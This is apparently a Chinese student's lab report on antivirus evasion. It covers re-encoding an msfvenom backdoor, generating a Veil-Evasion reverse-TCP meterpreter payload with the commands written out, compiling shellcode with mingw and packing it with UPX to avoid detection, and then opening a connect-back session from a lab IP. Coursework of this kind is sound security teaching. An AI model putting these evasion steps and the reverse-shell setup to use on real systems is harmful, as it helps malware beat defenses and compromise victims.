20155331 Exp3 免杀原理与实践

基础问题回答

杀软是如何检测出恶意代码的？

1.基于特征码的检测，2.启发式恶意软件检测，3.基于行为的恶意软件检测。

免杀是做什么？

让病毒不被杀毒软件杀掉。

免杀的基本方法有哪些？

1.改变特征码 2.加壳

实践总结与体会

这次实验让我深入理解了免杀原理，也让我知道了原来以前认为很安全的杀毒软件业并没有那么可靠，因为有很多方法可以实现免杀，给我们的电脑带来风险。

离实战还缺些什么技术或步骤？

实战中不可能那么容易在别人的电脑中植入一个后门程序。

实验的局限性很大。

实践过程记录

一.免杀效果参考基准

把上一次实验用msfvenom生成的后门放入http://www.virscan.org/进行检测

二.使用MSF编码器

对后门程序进行一次重新编码，再次进行检测

我们再将后门程序进行编码十次，然后再检测

可见，编码对免杀没啥用。

三.使用veil-evasion生成

启动evail-evasion，设置好回连的IP地址和端口号后，生成后门文件。
命令行中输入veil，
后在veil中输入命令use evasion

依次输入如下命令：

use c/meterpreter/rev_tcp.py

set LHOST 192.168.81.128
set LPORT 5331

generate
可执行文件的文件名（palyload5331）

通过命令找到文件

扫描结果

四.利用shellcode编写后门

首先，在Kali上使用命令生成一个c语言格式的Shellcode数组

创建一个文件5331dzdd.c，然后将unsigned char buf[]赋值到其中，

使用命令：i686-w64-mingw32-g++ 20155312.c -o 20155312.exe编译这个.c文件为可执行文件：

在扫描软件上看看

使用UPX对生成的后门程序加壳：

再扫描

杀毒软件没杀出来这个后门，实验成功，实现了免杀

回连

在kali下进入MSF打开监听进程，实现方法参考上期实验博客
尝试运行，后门程序成功获取权限

实验中遇到的问题

解决方案：把虚拟机里的.lck的文件夹给删了，然后再把任务管理器里面的所有VM关了再重启，不过每次重新开机时还是会有这个问题。